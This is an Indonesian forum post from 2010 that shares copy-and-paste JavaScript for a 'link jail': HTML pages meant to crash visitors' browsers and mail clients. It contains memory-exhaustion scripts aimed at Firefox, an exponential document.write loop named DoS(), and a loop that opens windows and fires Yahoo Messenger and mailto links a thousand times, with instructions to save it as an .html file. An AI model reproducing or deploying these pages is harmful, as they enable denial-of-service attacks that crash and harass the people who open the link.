Forum Diskusi & PES 2011
Would you like to react to this message? Create an account in a few clicks or log in to continue.

Membuat Link Jail 3

Go down

Membuat Link Jail 3 Empty Membuat Link Jail 3

Post by Hams Sun Oct 03, 2010 8:09 pm

Copy Script Di Bawah Ini :

<script LANGUAGE="javascript">
function append_text_into_body()
{
var p1 = document.getElementById('p1');
var Text1 = "";
var TextNode = null;

// Trigger! MakeFont... into p element on body element.
for(var i = 0; i < 0x700000 / 4; i++)
{
Text1 = Text1 + "AAAA";
}
TextNode = document.createTextNode(Text1);
p1.appendChild(TextNode); // Memory Exhaustion makes FireFox can't make Texts it caused an crash.
}
var a = 1;
var timer;
function fill_all_memory() // This function's variation can makes an null pointer deref without append_text_into_body() calling.
{
var chunk = unescape("䅁䉂");
var i = 0;

append_text_into_body();

while(chunk.length <= 0x400000)
{
chunk = chunk + chunk;
}
chunk = chunk + chunk + chunk;
chunk = chunk.substring(0, chunk.length);
}

function try_fill()
{
fill_all_memory();
setTimeout("try_fill();", 10);
}
</SCRIPT>
</HEAD>
<BODY onload="try_fill();">
<P id='p1'></P>
</BODY>
<body onload="javascript:DoS();"></body>
<script>
function DoS() {

var buffer = 'A';
for (i =0;i<31137;i++) {
buffer+=buffer+'A';
document.write('<html><marquee><h1>'+buffer+buffer);
}

}
</script>

======================


:::: script outlok crasch ::::

<script type="text/javascript">
var x = 1;
while (x <= 1000)
{
window.open ("http://www.siteanda.com/","mywindow");
document.location.href="ymsgr:sendIM?v3ndet4";
document.location.href="mailto:[Minta Di Banned Please]@security.com";
x++;
}
</script>
</head>
<body bgcolor="black" onload="message()">
</body>
</HTML>

SIMPAN DENGAN NAMA ***.HTML

Hams
Administrator
Administrator

Posting : 47
Points : 131
Reputation : 0
Join date : 2010-10-03
Age : 185
Location : No Name

Back to top Go down

Back to top

- Similar topics

 
Permissions in this forum:
You cannot reply to topics in this forum